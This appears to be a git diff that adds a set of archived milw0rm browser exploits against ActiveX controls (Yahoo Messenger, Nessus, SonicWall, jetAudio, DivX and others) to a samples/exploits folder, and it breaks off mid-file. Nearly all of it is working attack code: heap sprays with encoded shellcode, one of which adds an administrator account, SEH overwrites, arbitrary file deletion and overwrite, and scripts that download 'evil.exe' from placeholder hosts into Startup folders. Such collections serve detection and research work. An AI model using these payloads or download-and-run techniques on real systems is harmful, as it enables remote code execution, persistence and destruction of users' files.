+ var heapBlocks = (heapSprayToAddress - 0x400000) / heapBlockSize; // Number of heap blocks
+
+ spraySlide = getSpraySlide(spraySlide, spraySlideSize);
+
+ // We are going to create large blocks that will contain:
+ // [heap header][nopslide...........................][shellcode]
+ memory = new Array();
+ for (k = 0; k < heapBlocks; k++)
+ memory[k] = spraySlide + ShellCode;
+
+ // Create the Target string
+ while(Target.length < PwnEIP)
+ Target += "A";
+ Target += Ninja;
+
+ // Exploit !
+ NeoTracePro.TraceTarget(Target);
+ }
+
+ function getSpraySlide(spraySlide, spraySlideSize){
+ // The quickest way to create large blocks of memory is doubling their size untill they are
+ // big enough (or too big, in which case we cut them back to size.)
+ while(spraySlide.length * 2 < spraySlideSize)
+ spraySlide += spraySlide;
+
+ spraySlide = spraySlide.substring(0, spraySlideSize / 2);
+
+ return spraySlide;
+ }
+ </script>
+ </center>
+ </body>
+</html>
+
+# milw0rm.com [2007-07-07]
40 samples/exploits/4226.html
@@ -0,0 +1,40 @@
+<pre>
+<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------
+ <b>Clever Internet ActiveX Suite 6.2 (CLINETSUITEX6.OCX) Arbitrary file download/overwrite Exploit</b>
+ url: http://www.clevercomponents.com/home/news.asp
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ <b>This control is marked as
+ RegKey Safe for Script: True
+ RegKey Safe for Init: True
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller, data
+ IPStorage Safe: Safe for untrusted: caller,data</b>
+
+ Using the "GetToFile" method, you can download everything you want on a pc. This
+ exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
+-------------------------------------------------------------------------------------------------
+
+<object classid='clsid:E8F92847-7C21-452B-91A5-49D93AA18F30' id='test' ></object>
+
+<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
+
+<script language='vbscript'>
+Sub tryMe()
+
+ test.GetToFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\windows\system32\shinnai.txt"
+ MsgBox("Exploit completed!")
+
+End Sub
+</script>
+
+</span>
+</code></pre>
+
+# milw0rm.com [2007-07-25]
19 samples/exploits/4230.html
@@ -0,0 +1,19 @@
+<HTML>
+<!--
+Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit
+Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
+Just for fun ;]
+-->
+
+<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
+
+<script language="javascript">
+obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
+alert("done");
+</script>
+</HTML>
+
+# milw0rm.com [2007-07-26]
+
+
17 samples/exploits/4237.html
@@ -0,0 +1,17 @@
+<HTML>
+<!--
+Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
+Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
+Just for fun ;]
+-->
+
+<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
+
+<script language="javascript">
+obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
+obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
+</script>
+</HTML>
+
+# milw0rm.com [2007-07-27]
50 samples/exploits/4250.html
@@ -0,0 +1,50 @@
+<html>
+<!--
++++++++++++++++++++++++
++Last Modified by lhoang8500++
++++++++++++++++++++++++
+-->
+<html>
+<object classid="clsid:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>
+
+<SCRIPT language="javascript">
+
+ var heapSprayToAddress = 0x05050505;
+
+ var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");
+
+ var heapBlockSize = 0x400000;
+
+ var payLoadSize = payLoadCode.length * 2;
+
+ var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+
+ var spraySlide = unescape("%u9090%u9090");
+ spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+
+ heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+
+ memory = new Array();
+
+ for (i=0;i<heapBlocks;i++)
+ {
+ memory[i] = spraySlide + payLoadCode;
+ }
+ function getSpraySlide(spraySlide, spraySlideSize)
+ {
+ while (spraySlide.length*2<spraySlideSize)
+ {
+ spraySlide += spraySlide;
+ }
+ spraySlide = spraySlide.substring(0,spraySlideSize/2);
+ return spraySlide;
+ };
+var buffer = unescape("%u0505");
+while (buffer.length < 845) buffer+='\x0A';
+while (buffer.length< 1000) buffer+=unescape("%u0505");
+
+target.GetComponentVersion(buffer);
+</script>
+</html>
+
+# milw0rm.com [2007-07-31]
49 samples/exploits/4351.html
@@ -0,0 +1,49 @@
+<!--
+Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX Control Buffer Overflows
+
+update YM : http://messenger.yahoo.com/security_update.php?id=082907
+
+Functions : fvcom or info;
+RegKey Safe for Script: True
+RegKey Safe for Init: True
+-> that functions are safely scriptable and exploitable by HeapSpray Technique
+
+Tested : Windows XP Professional SP2 all patched,Internet Explorer 7
+
+That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -> I used "Simple DNS Plus" for manipulating the DNS resolution.
+
+I saved this file (exploit.htm) into directory root (web server)
+and I exploited with link : http://www.yahoo.com/exploit.htm
+
+coder : minhbq
+ mail : minhbq1985@gmail.com
+-->
+
+
+<html>
+<!-- CLSID of YverInfo.dll -->
+<object classid="CLSID:D5184A39-CBDF-4A4F-AC1A-7A45A852C883" id="target"></OBJECT>
+
+<SCRIPT language="javascript">
+// HeapSpray - execute calculator
+ shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+ bigblock = unescape("%u9090%u9090");
+ headersize = 20;
+ slackspace = headersize+shellcode.length
+ while (bigblock.length<slackspace) bigblock+=bigblock;
+ fillblock = bigblock.substring(0, slackspace);
+ block = bigblock.substring(0, bigblock.length-slackspace);
+ while(block.length+slackspace<0x40000) block = block+block+fillblock;
+ memory = new Array();
+ for (i=0;i<800;i++) memory[i] = block + shellcode;
+
+ var buffer = unescape("%0D");
+ while (buffer.length< 10000) buffer+=unescape("%0D");
+
+// Vulnerability of method fvcom
+ target.fvcom(buffer);
+
+</script>
+</html>
+
+# milw0rm.com [2007-09-01]
56 samples/exploits/4420.html
@@ -0,0 +1,56 @@
+<pre>
+<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
+ <b>MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite</b>
+ url: www.mw6tech.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ <b>Description:
+ This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
+ write to a file specified as an argument.
+ These can be exploited to overwrite and corrupt arbitrary files on the
+ system in the context of the currently logged-on user.
+
+ Marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller,data
+ IPersist Safe: Safe for untrusted: caller,data
+ IPStorage Safe: Safe for untrusted: caller,data
+ KillBitSet: Falso</b>
+-----------------------------------------------------------------------------
+<object classid='clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8' id='test' width='24' height='24'></object>
+
+<select style="width: 404px" name="Pucca">
+ <option value = "SaveAsBMP">SaveAsBMP</option>
+ <option value = "SaveAsWMF">SaveAsWMF</option>
+
+</select>
+
+<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
+
+<script language='vbscript'>
+ Sub tryMe
+ on error resume next
+ Dim MyMsg
+ if Pucca.value = "SaveAsBMP" then
+ test.SaveAsBMP "c:\windows\system_.ini"
+ MsgBox "Exploit completed."
+ elseif Pucca.value = "SaveAsWMF" then
+ test.SaveAsWMF "c:\windows\system_.ini"
+ MsgBox "Exploit completed."
+ end if
+ End Sub
+</script>
+</span></span>
+</code></pre>
+
+# milw0rm.com [2007-09-18]
29 samples/exploits/4427.html
@@ -0,0 +1,29 @@
+<HTML>
+<!--
+jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
+Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
+Tested on:..
+- jetAudio 7.0.3 Basic
+- Microsoft Internet Explorer 6
+Just for fun ;)
+-->
+
+<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>
+
+<script>
+var target = "DownloadFromMusicStore";
+//>rename evil.exe evil.mp3
+var url = "http://192.168.0.1/evil.mp3";
+var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
+var title = "0day";
+var artist = "h07";
+var album = "for fun";
+var genere = "exploit";
+var size = 256;
+var param1 = 0;
+var param2 = 0;
+obj[target](url, dst, title, artist, album, genere, size, param1, param2);
+</script>
+</HTML>
+
+# milw0rm.com [2007-09-19]
44 samples/exploits/4594.html
@@ -0,0 +1,44 @@
+<!--
+
+SonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.
+
+by krafty
+
+greets to SK, muts, halvar, grugq, and all the ethnical hackers
+
+sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
+
+Bring back the days of technotronic and r00tshell! Freedom.
+
+poc: launches calculator.
+Tested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all
+that jing-bang.
+
+-->
+
+
+<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>
+
+<script>
+
+var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
+
+var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
+do {
+ spray += spray;
+} while(spray.length < 0xc0000);
+
+memory = new Array();
+
+for(i = 0; i < 50; i++)
+ memory[i] = spray + shellcode;
+
+buf = "";
+for(i = 0; i < 50; i++)
+ buf += unescape("%05%05%05%05");
+
+nelx.AddRouteEntry("", buf);
+
+</script>
+
+# milw0rm.com [2007-11-01]
20 samples/exploits/4613.html
@@ -0,0 +1,20 @@
+<html>
+ <head>
+ <script language="JavaScript" DEFER>
+ function Check() {
+ var s = "AAAA";
+ while (s.length < 768 * 768) s=s+s;
+
+ var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}
+
+ obj.ShockwaveVersion(s);
+ }
+ </script>
+
+ </head>
+ <body onload="JavaScript: return Check();" />
+</html>
+
+# milw0rm.com [2007-11-08]
+
+
59 samples/exploits/4663.html
@@ -0,0 +1,59 @@
+<html>
+
+
+<object classid='clsid:5D86DDB5-BDF9-441B-9E9E-D4730F4EE499' id='BD'>
+</object>
+
+<script language="javascript">
+
+
+SCPL = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
+"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
+"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
+"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
+"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
+"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
+"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
+"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
+"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
+"%uCC4A%uD0FF");
+
+MemContent = unescape("%u0606");
+
+HSize = 20;
+
+FreeSpace = HSize+SCPL.length
+
+while (MemContent.length<FreeSpace)
+{
+ MemContent+=MemContent;
+}
+
+FB = MemContent.substring(0, FreeSpace);
+
+Mem = MemContent.substring(0, MemContent.length-FreeSpace);
+
+while(Mem.length+FreeSpace<0x60000)
+{
+ Mem = Mem+Mem+FB;
+}
+
+memory = new Array();
+
+for (x=0;x<600;x++) memory[x] = Mem + SCPL;
+
+var SiteAuthority = '%%';
+
+while (SiteAuthority.length < 60000)
+{
+ SiteAuthority+='\x30\x36\x30\x36';
+}
+
+BD.initx(SiteAuthority);
+
+</script>
+</html>
+
+# milw0rm.com [2007-11-27]
39 samples/exploits/4829.html
@@ -0,0 +1,39 @@
+<object id="divx" classid="clsid:D050D736-2D21-4723-AD58-5B541FFB6C11" style="display:none;">
+</object>
+
+<script>
+function crash() {
+var buff = '';
+for(i=0;i<=500;i++) {buff+="AAAAAAAAAA";}
+
+object = document.getElementById("divx");
+// modified by jose@
+divx.SetPassword(buff);
+}
+</script>
+
+<pre>
+<h3><u>DivX SetPassword (npUpload.dll) Denial of Service</u></h3>
+<b>Tested on IE 7 and Divx Player 6.6.0</b>
+
+<b>Registers:</b>
+
+EAX 00000000
+ECX FFFFFFFF
+EDX 0191CA50
+EBX 008E06E0
+ESP 0191C9E4
+EBP 0191CA50
+ESI 00000000
+EDI 00000000
+EIP 061F2B52 npUpload.061F2B52
+
+Access violation when reading [00000000]...
+
+
+<i>Discovered by shir, 02/01/2007</i>
+
+<a href="javascript:;" OnClick="crash()">Crash...</a>
+</pre>
+
+# milw0rm.com [2008-01-02]
30 samples/exploits/4869.html
@@ -0,0 +1,30 @@
+<!--
+Gateway Weblaunch ActiveX Control Insecure Method Exploit
+Implemented Categories:
+Category: Safe for Initialising
+Category: Safe for Scripting
+Written by e.b.
+Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
+This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
+-->
+<html>
+ <head>
+ <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
+ <script language="JavaScript" defer>
+ function Check() {
+
+ //escape from systemdrive\documents and settings\username\local settings\temp
+ obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
+
+ }
+
+ </script>
+ </head>
+ <body onload="JavaScript: return Check();">
+ <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
+ Unable to create object
+ </object>
+ </body>
+</html>
+
+# milw0rm.com [2008-01-08]
44 samples/exploits/4874.html
@@ -0,0 +1,44 @@
+<pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
+ <b>Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method</b>
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ <b><font color='red'>This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.</font></b>
+
+ <b>Technical details:</b>
+ File: RICHTX32.OCX
+ ver.: 6.1.97.82
+
+ While this GUID <b>{3B7C8860-D78F-101B-B9B5-04021C009402}</b> is
+ killbited, this one <b><font color='green'>{B617B991-A767-4F05-99BA-AC6FCABB102E}</font></b>
+
+ works fine so it is possible, using the "SaveFile()" method,
+ to save the content of the rich textbox on a user's pc.
+ This can be used to save, overwrite and/or corrupt arbitrary
+ files on the system.
+
+ It's marked as:
+ <b>RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IPersist Safe: Safe for untrusted: caller,data
+ IPStorage Safe: Safe for untrusted: caller,data</b>
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+<object classid='clsid:B617B991-A767-4F05-99BA-AC6FCABB102E' id='test' style='width: 250px; height: 75px'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
+<script language='vbscript'>
+ Sub tryMe
+ test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause"
+ test.SaveFile "C:\shinnai.bat", 1
+ MsgBox "Exploit completed!"
+ End Sub
+</script></span><span></code></pre>
+
+# milw0rm.com [2008-01-09]
+
+
33 samples/exploits/4875.html
@@ -0,0 +1,33 @@
+<pre>
+<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
+ <b>Microsoft VFP_OLE_Server Remote Command Execution</b>
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ <b><font color='red'>This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.</font></b>
+
+ Not much more to say than using "foxcommand()" function, you can
+ run applications passed as argument.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+<object classid='clsid:A7CD2320-6117-11D7-8096-0050042A4CD2' id='test'></object>
+
+<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
+
+<script language='vbscript'>
+ Sub tryMe
+ test.foxcommand "RUN calc.exe"
+ End Sub
+</script>
+
+</span></span>
+</code></pre>
+
+# milw0rm.com [2008-01-09]
+
+
71 samples/exploits/4894.html
@@ -0,0 +1,71 @@
+<!--
+StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit
+Written by e.b.
+Shellcode is limited to about 680 bytes
+Tested on Windows XP SP2(fully patched) English, IE6, ccpm_0237.dll 3.0.0.237
+Thanks to h.d.m. and the Metasploit crew
+-->
+<html>
+ <head>
+ <title>StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit</title>
+ <script language="JavaScript" defer>
+ function Check() {
+
+ var buf = 'A';
+ while (buf.length <= 242) buf = buf + 'A';
+
+
+// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
+var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
+ "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
+ "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
+ "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
+ "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
+ "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
+ "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
+ "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
+ "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
+ "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
+ "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
+ "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
+ "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
+ "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
+ "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
+ "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
+ "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
+ "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
+ "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
+ "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
+ "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
+ "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
+ "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
+ "%4e%31%75%74%38%70%65%77%70%43");
+
+
+ var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
+
+
+ //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis
+ //no SafeSEH
+ var seh_handler = unescape("%50%69%C9%74");
+
+ var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");
+
+ var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop;
+
+ obj.InternalTuneIn(m, "", 0, 0, 0);
+
+ }
+
+ </script>
+ </head>
+ <body onload="JavaScript: return Check();">
+ <object id="obj" classid="clsid:2253F320-AB68-4A07-917D-4F12D8884A06" height="0" width="0">
+ Unable to create object
+ </object>
+ </body>
+</html>
+
+# milw0rm.com [2008-01-11]
+
+
31 samples/exploits/4903.html
@@ -0,0 +1,31 @@
+<!--
+NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) remote heap
+overflow exploit (IE7/XP SP2)
+
+check a camera demo here: http://www.2mcctv.com/2mdemo.php
+codebase: http://www.dvrstation.com/pdvratl.php?vendor=0
+
+rgod /////////////////////////////// http://retrogod.altervista.org
+-->
+<html>
+<script language="javascript">
+//add su one, user: sun pass: tzu
+shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
+bigblock = unescape("%u9090%u9090");
+headersize = 20;
+slackspace = headersize+shellcode.length;
+while (bigblock.length<slackspace) bigblock+=bigblock;
+fillblock = bigblock.substring(0, slackspace);
+block = bigblock.substring(0, bigblock.length-slackspace);
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+memory = new Array();
+for (i=0;i<500;i++){memory[i] = block+shellcode}
+var suntzu = new ActiveXObject("PdvrAtl.PdvrOcx.1");//D64CF6D4-45DF-4D8F-9F14-E65FADF2777C
+wszFormat="";
+for (i=0;i<=1666;i++){wszFormat=wszFormat + unescape("%0d")}
+nTime=1;
+suntzu.TimeSpanFormat(nTime ,wszFormat);
+</script>
+</html>
+
+# milw0rm.com [2008-01-13]
35 samples/exploits/4909.html
@@ -0,0 +1,35 @@
+<!--
+Macrovision FlexNet DownloadManager Insecure Methods Exploit
+Implemented Categories:
+Category: Safe for Scripting
+Written by e.b.
+Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
+-->
+<html>
+ <head>
+ <title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
+ <script language="JavaScript" defer>
+ function Check() {
+
+ var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");
+
+ mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\harmless.exe");
+ mJob.SetPriority(0);
+ mJob.SetNotifyFlags(2);
+ mJob.ScheduleInterval = 2;
+
+ obj.RunScheduledJobs();
+
+
+ }
+
+ </script>
+ </head>
+ <body onload="JavaScript: return Check();">
+ <object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0" width="0">
+ Unable to create object
+ </object>
+ </body>
+</html>
+
+# milw0rm.com [2008-01-14]
79 samples/exploits/4918.html
@@ -0,0 +1,79 @@
+<!--
+RTS Sentry Digital Surveillance PTZCamPanel Class (CamPanel.dll 2.1.0.2)
+remote buffer overflow exploit (ie7/xp sp2)
+
+
+check this camera demo:
+http://www.rtssentry.com/index.asp?PageAction=Custom&ID=10
+
+
+
+
+rgod
+-
+stay tuned with us ...
+http://retrogod.altervista.org/join.html
+security feeds, radio streams, techno/drum & bass stations to come
+-->
+<html>
+<object classid='clsid:A86934DA-C3D6-4C1C-BD83-CA4F14B362DE' id='PTZCamPanelCtrl' /></object>
+<script language="javascript">
+//add su one, user: sun pass: tzu
+shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
+ "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
+ "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
+ "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
+ "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
+ "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
+ "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
+ "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
+ "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
+ "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
